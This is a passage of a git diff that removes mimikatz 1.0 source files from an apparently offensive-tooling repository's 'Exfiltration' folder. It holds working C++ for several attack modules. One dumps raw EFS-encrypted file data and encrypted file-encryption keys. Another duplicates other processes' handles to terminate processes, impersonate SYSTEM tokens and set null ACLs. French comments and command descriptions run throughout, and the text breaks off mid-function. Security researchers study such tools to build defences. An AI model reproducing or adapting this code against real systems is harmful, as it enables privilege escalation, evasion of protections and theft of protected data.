"; - if(monFichierDestination = _wfopen(arguments->back().c_str(), L"wb")) - { - (*outputStream) << L"OK" << endl; - fwrite(monBufferData, tailleData, 1, monFichierDestination); - fclose(monFichierDestination); - } - else (*outputStream) << L"KO" << endl; - } - else (*outputStream) << L" * Donnes : " << endl << endl << wstring(reinterpret_cast<char *>(monBufferData), reinterpret_cast<char *>(monBufferData + tailleData)) << endl; - } - else (*outputStream) << L"KO - diffrent de \'PIT\' ; " << mod_text::stringOfHex(HEADER_PIT, sizeof(HEADER_PIT)) << L" != " << mod_text::stringOfHex(monBuffer, sizeof(HEADER_PIT)) << endl; - } - else (*outputStream) << L"KO"; - } - else (*outputStream) << L"KO"; - delete [] monBuffer; - } - else (*outputStream) << L"KO" << endl; - } - return true; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_divers.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_divers.h deleted file mode 100644 index 9bfcf9f..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_divers.h +++ /dev/null @@ -1,30 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_process.h" -#include "mod_patch.h" -#include "mod_secacl.h" -#include "mod_text.h" -#include "mod_crypto.h" -#include <iostream> -#include <wincred.h> -#include "..\global.h" - -class mod_mimikatz_divers -{ -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool cancelator(vector<wstring> * arguments); - static bool noroutemon(vector<wstring> * arguments); - static bool eventdrop(vector<wstring> * arguments); - static bool secrets(vector<wstring> * arguments); - static bool nodetour(vector<wstring> * arguments); - static bool pitme(vector<wstring> * arguments); -}; - - diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_efs.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_efs.cpp deleted file mode 100644 index 366c062..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_efs.cpp +++ /dev/null @@ -1,300 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` -http://blog.gentilkiwi.com -benjamin@gentilkiwi.com -Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_efs.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_efs::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(infos, L"infos", L"Affiche des informations basiques sur un fichier chiffr")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(full, L"full", L"Affiche des informations trs dtailles sur un fichier chiffr")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(toraw, L"toraw", L"Dump les donnes EFS d'un fichier chiffr vers un fichier brut")); - // monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(fromraw, L"fromraw")); - return monVector; -} - -bool mod_mimikatz_efs::infos(vector<wstring> * arguments) -{ - if(!arguments->empty()) - { - PENCRYPTION_CERTIFICATE_HASH_LIST pHashes = NULL; - - if(QueryUsersOnEncryptedFile(arguments->front().c_str(), &pHashes) == ERROR_SUCCESS) - { - (*outputStream) << L"Utilisateur(s) dclar(s) : " << pHashes->nCert_Hash << endl; - printInfos(pHashes); - FreeEncryptionCertificateHashList(pHashes); - } - else (*outputStream) << L"Erreur QueryUsersOnEncryptedFile : " << mod_system::getWinError() << endl; - - if(QueryRecoveryAgentsOnEncryptedFile(arguments->front().c_str(), &pHashes) == ERROR_SUCCESS) - { - (*outputStream) << L"Agent(s) de recouvrement : " << pHashes->nCert_Hash << endl; - printInfos(pHashes); - FreeEncryptionCertificateHashList(pHashes); - } - else (*outputStream) << L"Erreur QueryRecoveryAgentsOnEncryptedFile : " << mod_system::getWinError() << endl; - - } - return true; -} - -bool mod_mimikatz_efs::full(vector<wstring> * arguments) -{ - if(!arguments->empty()) - { - PVOID pvContext = NULL; - if(OpenEncryptedFileRaw(arguments->front().c_str(), 0, &pvContext) == ERROR_SUCCESS) - { - SIMPLE_BYTE_ARRAY sba = {0, reinterpret_cast<BYTE *>(malloc(0))}; - if(ReadEncryptedFileRaw(ExportToArrayCallback, &sba, pvContext) == ERROR_SUCCESS) - { - PEFS_FEK Fek = NULL; - PEFS_STREAM_DATA_SEGMENT monDataSegment = NULL; - for( - PEFS_MARSHALED_STREAM monMarshaledStream = reinterpret_cast<PEFS_MARSHALED_STREAM>(sba.tableau + sizeof(EFS_RAW)); - reinterpret_cast<PBYTE>(monMarshaledStream) < (sba.tableau + sba.nbElements); - monMarshaledStream = reinterpret_cast<PEFS_MARSHALED_STREAM>(monDataSegment) - ) - { - - bool isEFSMetaData = (monMarshaledStream->NameLenght == 2) && (monMarshaledStream->StreamName[0] == 0x1910); - - (*outputStream) << endl << - L"Marshaled Stream :" << endl << - L" * Taille : " << monMarshaledStream->Length << endl << - L" * Flag : " << monMarshaledStream->Flag << endl << - L" * Nom : " << (isEFSMetaData ? wstring(L"(EFS Metadata stream)") : wstring(monMarshaledStream->StreamName, monMarshaledStream->NameLenght / sizeof(wchar_t))) << endl << - L" * Type : " << (isEFSMetaData ? L"EFS Metadata" : L"DATA") << endl << - endl; - - for( - monDataSegment = reinterpret_cast<PEFS_STREAM_DATA_SEGMENT>(reinterpret_cast<PBYTE>(monMarshaledStream) + monMarshaledStream->Length); - (reinterpret_cast<PBYTE>(monDataSegment) < (sba.tableau + sba.nbElements)) && (monDataSegment->GURE0 == 0x00550047) && (monDataSegment->GURE1 == 0x00450052); - monDataSegment = reinterpret_cast<PEFS_STREAM_DATA_SEGMENT>(reinterpret_cast<PBYTE>(monDataSegment) + monDataSegment->Length) - ) - - { - (*outputStream) << L"DataSegment : " << endl; - PBYTE StreamData = reinterpret_cast<PBYTE>(monDataSegment) + sizeof(EFS_STREAM_DATA_SEGMENT); - - if(isEFSMetaData) - { - (*outputStream) << L" EFS Metadata :" << endl; - - PEFS_METADATA_1 mesAttr = reinterpret_cast<PEFS_METADATA_1>(StreamData); - (*outputStream) << L" * Version EFS : " << mesAttr->EFS_Version << endl; - if(mesAttr->DDF_Offset) - { - (*outputStream) << L" * Utilisateur(s) dclar(s) :" << endl; - fullInfosFromEFS_KEY_LIST(mesAttr, mesAttr->DDF_Offset, &Fek); - } - if(mesAttr->DRF_Offset) - { - (*outputStream) << L" * Agent(s) de recouvrement :" << endl; - fullInfosFromEFS_KEY_LIST(mesAttr, mesAttr->DRF_Offset, &Fek); - } - } - else - { - (*outputStream) << L" DATA :" << endl; - if(!monMarshaledStream->Flag) - { - (*outputStream) << L" DATA Segment Encryption Header :" << endl; - PEFS_STREAM_DATA_SEGMENT_ENCRYPTION_HEADER monSegEncHead = reinterpret_cast<PEFS_STREAM_DATA_SEGMENT_ENCRYPTION_HEADER>(StreamData); - (*outputStream) << - L" * Length : " << monSegEncHead->Length << endl << - L" * StartingFile_Offset : " << monSegEncHead->StartingFile_Offset << endl << - L" * BytesWithinStreamSize : " << monSegEncHead->BytesWithinStreamSize << endl << - L" * BytesWithinVDL : " << monSegEncHead->BytesWithinVDL << endl << - L" * DataUnitShift : " << monSegEncHead->DataUnitShift << endl << - L" * ChunkShift : " << monSegEncHead->ChunkShift << endl << - L" * ClusterShift : " << monSegEncHead->ClusterShift << endl << - L" * NumberOfDataBlocks : " << monSegEncHead->NumberOfDataBlocks << endl << - endl; - - PEFS_EXTENDED_HEADER monExtHeader = reinterpret_cast<PEFS_EXTENDED_HEADER>(reinterpret_cast<PBYTE>(monSegEncHead) + FIELD_OFFSET(EFS_STREAM_DATA_SEGMENT_ENCRYPTION_HEADER, DataBlockSizes) + (sizeof(DWORD) * monSegEncHead->NumberOfDataBlocks)); - if(monExtHeader->EXTD_Number == 'DTXE') - { - (*outputStream) << L" * Extended Header Flag : " << monExtHeader->Flags << endl; - } - - for(DWORD block = 0; block < monSegEncHead->NumberOfDataBlocks; block++) - { - (*outputStream) << L" -> Block " << block+1 << L" ; taille : " << monSegEncHead->DataBlockSizes[block] << endl; - - PBYTE mesDatas = reinterpret_cast<PBYTE>(StreamData) + monSegEncHead->Length; - (*outputStream) << mod_text::stringOfHex(mesDatas, monSegEncHead->DataBlockSizes[block], 16) << endl; - - if(Fek); - } - } - else - { - (*outputStream) << L"TODO Data" << endl; - } - } - } - } - } - else (*outputStream) << L"Erreur ReadEncryptedFileRaw : " << mod_system::getWinError() << endl; - - free(sba.tableau); - CloseEncryptedFileRaw(pvContext); - } - else (*outputStream) << L"Erreur OpenEncryptedFileRaw : " << mod_system::getWinError() << endl; - } - return true; -} - -bool mod_mimikatz_efs::toraw(vector<wstring> * arguments) -{ - if(arguments->size() == 2) - { - PVOID pvContext = NULL; - (*outputStream) << L"Ouverture de : " << arguments->front() << endl; - if(OpenEncryptedFileRaw(arguments->front().c_str(), 0, &pvContext) == ERROR_SUCCESS) - { - (*outputStream) << L"Vers : " << arguments->back() << endl; - HANDLE hFile = CreateFile(arguments->back().c_str(), GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); - if(ReadEncryptedFileRaw(ExportToFileCallback, &hFile, pvContext) == ERROR_SUCCESS) - { - (*outputStream) << L" * Export OK" << endl; - } - else (*outputStream) << L"* Erreur ReadEncryptedFileRaw : " << mod_system::getWinError() << endl; - CloseHandle(hFile); - CloseEncryptedFileRaw(pvContext); - } - else (*outputStream) << L"Erreur OpenEncryptedFileRaw : " << mod_system::getWinError() << endl; - } - return true; -} - -void mod_mimikatz_efs::printInfos(PENCRYPTION_CERTIFICATE_HASH_LIST hashList) -{ - for(DWORD i = 0; i < hashList->nCert_Hash; i++) - { - wstring user; - mod_secacl::simpleSidToString(hashList->pUsers[i]->pUserSid, &user); - - (*outputStream) << - L" * Nom : " << user << endl << - L" * Nom simple : " << hashList->pUsers[i]->lpDisplayInformation << endl << - L" * Hash du certificat : " << mod_text::stringOfHex(hashList->pUsers[i]->pHash->pbData, hashList->pUsers[i]->pHash->cbData) << endl << - endl; - } -} - -DWORD WINAPI mod_mimikatz_efs::ExportToArrayCallback(PBYTE pbData, PVOID pvCallbackContext, DWORD ulLength) -{ - if(ulLength) - { - PSIMPLE_BYTE_ARRAY sba = reinterpret_cast<PSIMPLE_BYTE_ARRAY>(pvCallbackContext); - sba->tableau = reinterpret_cast<PBYTE>(realloc(sba->tableau, sba->nbElements + ulLength)); - if(sba->tableau) - { - RtlCopyMemory(sba->tableau + sba->nbElements, pbData, ulLength); - sba->nbElements += ulLength; - } - else - return ERROR_NOT_ENOUGH_MEMORY; - } - return ERROR_SUCCESS; -} - -DWORD WINAPI mod_mimikatz_efs::ExportToFileCallback(PBYTE pbData, PVOID pvCallbackContext, ULONG ulLength) -{ - if(ulLength) - { - (*outputStream) << L" - Lecture d\'un bloc de : " << ulLength << endl; - DWORD dwBytesWritten = 0; - if(WriteFile(*reinterpret_cast<PHANDLE>(pvCallbackContext), pbData, ulLength, &dwBytesWritten, NULL) && (ulLength == dwBytesWritten)) - return ERROR_SUCCESS; - return GetLastError(); - } - return ERROR_SUCCESS; -} - -bool mod_mimikatz_efs::fullInfosFromEFS_KEY_LIST(PEFS_METADATA_1 header, LONG KeyList_offset, PEFS_FEK * pFek) -{ - *pFek = NULL; - PEFS_KEY_LIST monHead = reinterpret_cast<PEFS_KEY_LIST>(reinterpret_cast<PBYTE>(header) + KeyList_offset); - - PEFS_KEY_LIST_ENTRY monHeader = reinterpret_cast<PEFS_KEY_LIST_ENTRY>(monHead); - DWORD previousSize = sizeof(PEFS_KEY_LIST); - for(DWORD i = 0; i < monHead->Length; i++) - { - (*outputStream) << endl << L" Champ de donnes " << (i + 1) << L" :" << endl; - monHeader = reinterpret_cast<PEFS_KEY_LIST_ENTRY>((PBYTE) monHeader + previousSize); - - PEFS_PUBLIC_KEY_INFORMATION monCredHeader = reinterpret_cast<PEFS_PUBLIC_KEY_INFORMATION>(reinterpret_cast<PBYTE>(monHeader) + monHeader->PKI_Offset); - wstring user; - if(monCredHeader->OwnerSID_offset) - mod_secacl::simpleSidToString((reinterpret_cast<PBYTE>(monCredHeader) + monCredHeader->OwnerSID_offset), &user); - else user.assign(L"(null)"); - - (*outputStream) << L" * Utilisateur : " << user << endl; - fullInfosFromEFS_CERTIFICATE_DATA(monCredHeader, monCredHeader->Certificate_offset); - - PBYTE Encrypted_FEK = reinterpret_cast<PBYTE>(monHeader) + monHeader->Enc_FEK_Offset; - (*outputStream) << - L" * Flags : " << monHeader->Flags << endl << - L" * FEK (chiffre) : " << endl << - L" -> Taille : " << monHeader->Enc_FEK_Length << endl << - L" -> Donnes : " << endl << mod_text::stringOfHex(Encrypted_FEK, monHeader->Enc_FEK_Length, 16) << endl << - endl; - - /*HCRYPTPROV hCryptKeyProv; - if(CryptAcquireContext(&hCryptKeyProv, L"", MS_STRONG_PROV, PROV_RSA_FULL, NULL )) - { - HCRYPTKEY maCle = NULL; - if(CryptGetUserKey(hCryptKeyProv, AT_KEYEXCHANGE, &maCle)) - { - DWORD taille = monHeader->Enc_FEK_Length; - if (CryptDecrypt(maCle, 0, TRUE, 0, Encrypted_FEK, &taille) ) - { - *pFek = reinterpret_cast<PEFS_FEK>(Encrypted_FEK); - (*outputStream) << - L" * FEK (clair) : " << endl << - L" -> Taille : " << (*pFek)->Key_Lenght << endl << - L" -> Algorithme : " << (*pFek)->Algorithm << endl << - L" -> Entropie : " << (*pFek)->Entropy << endl << - L" -> Donnes : " << endl << mod_text::stringOfHex((*pFek)->Key, (*pFek)->Key_Lenght, 16) << endl << - endl; - } - else - (*outputStream) << mod_system::getWinError() << endl; - } - CryptReleaseContext(hCryptKeyProv, 0); - }*/ - - previousSize = monHeader->Length; - } - - return (*pFek != NULL); -} - -void mod_mimikatz_efs::fullInfosFromEFS_CERTIFICATE_DATA(PEFS_PUBLIC_KEY_INFORMATION header, LONG Certificate_offset) -{ - PEFS_CERTIFICATE_DATA monThCertificate = reinterpret_cast<PEFS_CERTIFICATE_DATA>(reinterpret_cast<PBYTE>(header) + header->Certificate_offset); - - (*outputStream) << L" -> Nom affich : "; - if(monThCertificate->DisplayName_Offset) - (*outputStream) << reinterpret_cast<wchar_t *>(reinterpret_cast<PBYTE>(monThCertificate) + monThCertificate->DisplayName_Offset); - (*outputStream) << endl; - - (*outputStream) << L" -> Provider : "; - if(monThCertificate->ProviderName_Offset) - (*outputStream) << reinterpret_cast<wchar_t *>(reinterpret_cast<PBYTE>(monThCertificate) + monThCertificate->ProviderName_Offset); - (*outputStream) << endl; - - (*outputStream) << L" -> Container : "; - if(monThCertificate->ContainerName_Offset) - (*outputStream) << reinterpret_cast<wchar_t *>(reinterpret_cast<PBYTE>(monThCertificate) + monThCertificate->ContainerName_Offset); - (*outputStream) << endl; - - (*outputStream) << L" -> Empreinte : " << mod_text::stringOfHex(reinterpret_cast<PBYTE>(monThCertificate) + monThCertificate->CertificateThumbprint, monThCertificate->CertificateThumbprint_Length) << endl; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_efs.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_efs.h deleted file mode 100644 index 0a82140..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_efs.h +++ /dev/null @@ -1,133 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include <WinEFS.h> -#include <iostream> -#include "mod_text.h" -#include "mod_system.h" -#include "mod_secacl.h" -#include "mod_crypto.h" - -class mod_mimikatz_efs -{ -private: - // http://msdn.microsoft.com/library/cc230447.aspx - typedef struct _EFS_RAW { - DWORD Unknown0; - DWORD ROBS0; - DWORD ROBS1; - BYTE Reserved[8]; - } EFS_RAW, *PEFS_RAW; - - typedef struct _EFS_MARSHALED_STREAM { - DWORD Length; - DWORD NTFS0; - DWORD NTFS1; - DWORD Flag; - BYTE Reserved[8]; - DWORD NameLenght; - wchar_t StreamName[1]; - } EFS_MARSHALED_STREAM, *PEFS_MARSHALED_STREAM; - - typedef struct _EFS_STREAM_DATA_SEGMENT { - DWORD Length; - DWORD GURE0; - DWORD GURE1; - DWORD Reserved; - } EFS_STREAM_DATA_SEGMENT, *PEFS_STREAM_DATA_SEGMENT; - - typedef struct _EFS_STREAM_DATA_SEGMENT_ENCRYPTION_HEADER { - LONG64 StartingFile_Offset; - DWORD Length; - DWORD BytesWithinStreamSize; - DWORD BytesWithinVDL; - USHORT ReservedForAlignement0; - BYTE DataUnitShift; - BYTE ChunkShift; - BYTE ClusterShift; - BYTE ReservedForAlignement1; - USHORT NumberOfDataBlocks; - DWORD DataBlockSizes[1]; - } EFS_STREAM_DATA_SEGMENT_ENCRYPTION_HEADER, *PEFS_STREAM_DATA_SEGMENT_ENCRYPTION_HEADER; - - typedef struct _EFS_EXTENDED_HEADER { - DWORD EXTD_Number; - DWORD Length; - DWORD Flags; - DWORD Reserved; - } EFS_EXTENDED_HEADER, *PEFS_EXTENDED_HEADER; - - typedef struct _EFS_METADATA_1 { - DWORD Length; - DWORD Reserved1; - DWORD EFS_Version; - DWORD Reserved2; - BYTE EFS_ID[16]; - BYTE EFS_Hash[16]; - BYTE Reserved3[16]; - LONG DDF_Offset; - LONG DRF_Offset; - BYTE Reserved4[12]; - } EFS_METADATA_1, *PEFS_METADATA_1; - - typedef struct _EFS_KEY_LIST { - DWORD Length; - } EFS_KEY_LIST, *PEFS_KEY_LIST; - - typedef struct _EFS_KEY_LIST_ENTRY { - DWORD Length; - LONG PKI_Offset; - DWORD Enc_FEK_Length; - LONG Enc_FEK_Offset; - DWORD Flags; - } EFS_KEY_LIST_ENTRY, *PEFS_KEY_LIST_ENTRY; - - typedef struct _EFS_PUBLIC_KEY_INFORMATION { - DWORD Length; - LONG OwnerSID_offset; - DWORD Type; - DWORD Certificate_Length; - LONG Certificate_offset; - } EFS_PUBLIC_KEY_INFORMATION, *PEFS_PUBLIC_KEY_INFORMATION; - - typedef struct _EFS_CERTIFICATE_DATA { - LONG CertificateThumbprint; - DWORD CertificateThumbprint_Length; - LONG ContainerName_Offset; - LONG ProviderName_Offset;; - LONG DisplayName_Offset; - } EFS_CERTIFICATE_DATA, *PEFS_CERTIFICATE_DATA; - - typedef struct _EFS_FEK { - DWORD Key_Lenght; - DWORD Entropy; - ALG_ID Algorithm; - DWORD Reserverd; - BYTE Key[1]; - } EFSFEK, *PEFS_FEK; - - typedef struct _SIMPLE_BYTE_ARRAY{ - SIZE_T nbElements; - PBYTE tableau; - } SIMPLE_BYTE_ARRAY, *PSIMPLE_BYTE_ARRAY; - - static DWORD WINAPI ExportToArrayCallback(PBYTE pbData, PVOID pvCallbackContext, DWORD ulLength); - static DWORD WINAPI ExportToFileCallback(PBYTE pbData, PVOID pvCallbackContext, DWORD ulLength); - static void printInfos(PENCRYPTION_CERTIFICATE_HASH_LIST hashList); - - static bool fullInfosFromEFS_KEY_LIST(PEFS_METADATA_1 header, LONG KeyList_offset, PEFS_FEK * Fek); - static void fullInfosFromEFS_CERTIFICATE_DATA(PEFS_PUBLIC_KEY_INFORMATION header, LONG Certificate_offset); - -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool infos(vector<wstring> * arguments); - static bool full(vector<wstring> * arguments); - static bool toraw(vector<wstring> * arguments); - static bool fromraw(vector<wstring> * arguments); -}; - diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_handle.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_handle.cpp deleted file mode 100644 index 8e45ee6..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_handle.cpp +++ /dev/null @@ -1,301 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_handle.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_handle::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(list, L"list", L"Affiche les handles du systme (pour le moment juste les processus et tokens)")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(processStop, L"processStop", L"Essaye de stopper un ou plusieurs processus en utilisant d\'autres handles")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(tokenImpersonate, L"tokenImpersonate", L"Essaye d\'impersonaliser un token en utilisant d\'autres handles")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(nullAcl, L"nullAcl", L"Positionne une ACL null sur des Handles")); - return monVector; -} - -bool mod_mimikatz_handle::list(vector<wstring> * arguments) -{ - vector<mod_process::KIWI_PROCESSENTRY32> * mesProcess = new vector<mod_process::KIWI_PROCESSENTRY32>(); - - bool isProcessList = mod_process::getList(mesProcess); - vector<SYSTEM_HANDLE> * mesHandles = new vector<SYSTEM_HANDLE>(); - - DWORD id = (!arguments->empty() ? _wtoi(arguments->front().c_str()) : 0); - - if(mod_system::getSystemHandles(mesHandles, arguments->empty() ? NULL : &id)) - { - for(vector<SYSTEM_HANDLE>::iterator monHandle = mesHandles->begin(); monHandle != mesHandles->end(); monHandle++) - { - HANDLE hProcess; - if(hProcess = OpenProcess(PROCESS_DUP_HANDLE, false, monHandle->ProcessId)) - { - HANDLE nouveauHandle; - if(DuplicateHandle(hProcess, reinterpret_cast<HANDLE>(monHandle->Handle), GetCurrentProcess(), &nouveauHandle, 0, false, DUPLICATE_SAME_ACCESS)) - { - wstring tokenType; - if(mod_system::getHandleType(nouveauHandle, &tokenType)) - { - bool isToken = (_wcsicmp(tokenType.c_str(), L"token") == 0); - bool isProcess = (_wcsicmp(tokenType.c_str(), L"process") == 0); - - if(isToken || isProcess) - { - (*outputStream) << setw(5) << setfill(wchar_t(' ')) << monHandle->ProcessId << L" "; - - if(isProcessList) - { - mod_process::KIWI_PROCESSENTRY32 * processHote = new mod_process::KIWI_PROCESSENTRY32(); - if(mod_process::getProcessEntryFromProcessId(monHandle->ProcessId, processHote, mesProcess)) - (*outputStream) << setw(25) << setfill(wchar_t(' ')) << left << processHote->szExeFile << right; - delete processHote; - } - - (*outputStream) << L" -> " << setw(5) << setfill(wchar_t(' ')) << monHandle->Handle << L'\t' << tokenType << L'\t'; - - if(isToken) - { - wstring userName, domainName; - if(mod_secacl::tokenUser(nouveauHandle, &userName, &domainName)) - (*outputStream) << L'\t' << domainName << L'\\' << userName ; - else (*outputStream) << mod_system::getWinError(); - } - else if(isProcess) - { - DWORD monPid = GetProcessId(nouveauHandle); - (*outputStream) << monPid; - - if(isProcessList) - { - mod_process::KIWI_PROCESSENTRY32 * processKiwi = new mod_process::KIWI_PROCESSENTRY32(); - if(mod_process::getProcessEntryFromProcessId(monPid, processKiwi, mesProcess)) - (*outputStream) << L'\t' << processKiwi->szExeFile; - delete processKiwi; - } - } - (*outputStream) << endl; - } - } - CloseHandle(nouveauHandle); - } - CloseHandle(hProcess); - } - } - } - else (*outputStream) << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl; - - delete mesHandles; - - return true; -} - -bool mod_mimikatz_handle::processStop(vector<wstring> * arguments) -{ - vector<mod_process::KIWI_PROCESSENTRY32> * mesProcess = new vector<mod_process::KIWI_PROCESSENTRY32>(); - - bool isProcessList = mod_process::getList(mesProcess); - vector<SYSTEM_HANDLE> * mesHandles = new vector<SYSTEM_HANDLE>(); - - if(mod_system::getSystemHandles(mesHandles)) - { - for(vector<SYSTEM_HANDLE>::iterator monHandle = mesHandles->begin(); monHandle != mesHandles->end(); monHandle++) - { - HANDLE hProcess; - if(hProcess = OpenProcess(PROCESS_DUP_HANDLE, false, monHandle->ProcessId)) - { - HANDLE nouveauHandle; - if(DuplicateHandle(hProcess, reinterpret_cast<HANDLE>(monHandle->Handle), GetCurrentProcess(), &nouveauHandle, 0, false, DUPLICATE_SAME_ACCESS)) - { - wstring tokenType; - if(mod_system::getHandleType(nouveauHandle, &tokenType)) - { - if(_wcsicmp(tokenType.c_str(), L"process") == 0) - { - if(isProcessList) - { - mod_process::KIWI_PROCESSENTRY32 * processHote = new mod_process::KIWI_PROCESSENTRY32(); - mod_process::KIWI_PROCESSENTRY32 * processKiwi = new mod_process::KIWI_PROCESSENTRY32(); - DWORD monPid = GetProcessId(nouveauHandle); - if( - mod_process::getProcessEntryFromProcessId(monHandle->ProcessId, processHote, mesProcess) && - mod_process::getProcessEntryFromProcessId(monPid, processKiwi, mesProcess) - ) - { - - for(vector<wstring>::iterator monProcessName = arguments->begin(); monProcessName != arguments->end(); monProcessName++) - { - if(_wcsicmp(processKiwi->szExeFile.c_str(), monProcessName->c_str()) == 0) - { - (*outputStream) << - setw(5) << setfill(wchar_t(' ')) << monHandle->ProcessId << L" " << - setw(25) << setfill(wchar_t(' ')) << left << processHote->szExeFile << right << L" -> " << - setw(5) << setfill(wchar_t(' ')) << monHandle->Handle << L'\t' << - monPid << L'\t' << processKiwi->szExeFile << endl; - ; - - - (*outputStream) << L"\tTerminate Process - "; - if(TerminateProcess(nouveauHandle, ERROR_SUCCESS) != 0) - { - (*outputStream) << L"OK"; - } - else - { - (*outputStream) << L"KO ; " << mod_system::getWinError() << endl << - L"\tJob : "; - - if(HANDLE monObject = CreateJobObject(NULL, NULL)) - { - if(AssignProcessToJobObject(monObject, nouveauHandle)) - { - (*outputStream) << L"TerminateJobObject - "; - if(TerminateJobObject(monObject, ERROR_SUCCESS) != 0) - { - (*outputStream) << L"OK"; - } - else (*outputStream) << L"KO ; " << mod_system::getWinError(); - } - else (*outputStream) << L"AssignProcessToJobObject - KO ; " << mod_system::getWinError(); - CloseHandle(monObject); - } - - } - - (*outputStream) << endl; - } - } - } - delete processKiwi; - delete processHote; - } - } - } - CloseHandle(nouveauHandle); - } - CloseHandle(hProcess); - } - } - } - else (*outputStream) << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl; - - delete mesHandles; - - return true; -} - -bool mod_mimikatz_handle::tokenImpersonate(vector<wstring> * arguments) -{ - PNT_SET_INFORMATION_PROCESS NtSetInformationProcess = reinterpret_cast<PNT_SET_INFORMATION_PROCESS>(GetProcAddress(GetModuleHandle(L"ntdll"), "NtSetInformationProcess")); - vector<mod_process::KIWI_PROCESSENTRY32> * mesProcess = new vector<mod_process::KIWI_PROCESSENTRY32>(); - - bool isProcessList = mod_process::getList(mesProcess); - vector<SYSTEM_HANDLE> * mesHandles = new vector<SYSTEM_HANDLE>(); - - if(mod_system::getSystemHandles(mesHandles)) - { - for(vector<SYSTEM_HANDLE>::iterator monHandle = mesHandles->begin(); monHandle != mesHandles->end(); monHandle++) - { - HANDLE hProcess; - if(hProcess = OpenProcess(PROCESS_DUP_HANDLE, false, monHandle->ProcessId)) - { - HANDLE nouveauHandle; - if(DuplicateHandle(hProcess, reinterpret_cast<HANDLE>(monHandle->Handle), GetCurrentProcess(), &nouveauHandle, 0, false, DUPLICATE_SAME_ACCESS)) - { - wstring tokenType; - if(mod_system::getHandleType(nouveauHandle, &tokenType)) - { - if(_wcsicmp(tokenType.c_str(), L"token") == 0) - { - if(isProcessList) - { - mod_process::KIWI_PROCESSENTRY32 * processHote = new mod_process::KIWI_PROCESSENTRY32(); - if( - mod_process::getProcessEntryFromProcessId(monHandle->ProcessId, processHote, mesProcess) - ) - { - wstring userName, domainName; - if(mod_secacl::tokenUser(nouveauHandle, &userName, &domainName)) - { - if(_wcsicmp(userName.c_str(), (arguments->empty() ? L"system" : arguments->front().c_str())) == 0) - { - (*outputStream) << - setw(5) << setfill(wchar_t(' ')) << monHandle->ProcessId << L" " << - setw(25) << setfill(wchar_t(' ')) << left << processHote->szExeFile << right << L" -> " << - setw(5) << setfill(wchar_t(' ')) << monHandle->Handle << L'\t' << - domainName << L'\\' << userName << L'\t'; - - if(mod_secacl::exchangeDupToken(&nouveauHandle)) - { - if(ImpersonateLoggedOnUser(nouveauHandle)) - { - (*outputStream) << L"ok !!" << endl; - break; - } - else - { - (*outputStream) << L"ko - ImpersonateLoggedOnUser ; " << mod_system::getWinError() << endl; - } - } - else - { - (*outputStream) << L"ko - mod_secacl::exchangeDupToken ; " << mod_system::getWinError() << endl; - } - - } - } - else (*outputStream) << mod_system::getWinError(); - } - delete processHote; - } - } - } - CloseHandle(nouveauHandle); - } - CloseHandle(hProcess); - } - } - } - else (*outputStream) << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl; - - delete mesHandles; - - return true; -} - -bool mod_mimikatz_handle::nullAcl(vector<wstring> * arguments) -{ - vector<SYSTEM_HANDLE> * mesHandles = new vector<SYSTEM_HANDLE>(); - if(mod_system::getSystemHandles(mesHandles)) - { - for(vector<SYSTEM_HANDLE>::iterator monHandle = mesHandles->begin(); monHandle != mesHandles->end(); monHandle++) - { - HANDLE hProcess; - if(hProcess = OpenProcess(PROCESS_DUP_HANDLE, false, monHandle->ProcessId)) - { - HANDLE nouveauHandle; - if(DuplicateHandle(hProcess, reinterpret_cast<HANDLE>(monHandle->Handle), GetCurrentProcess(), 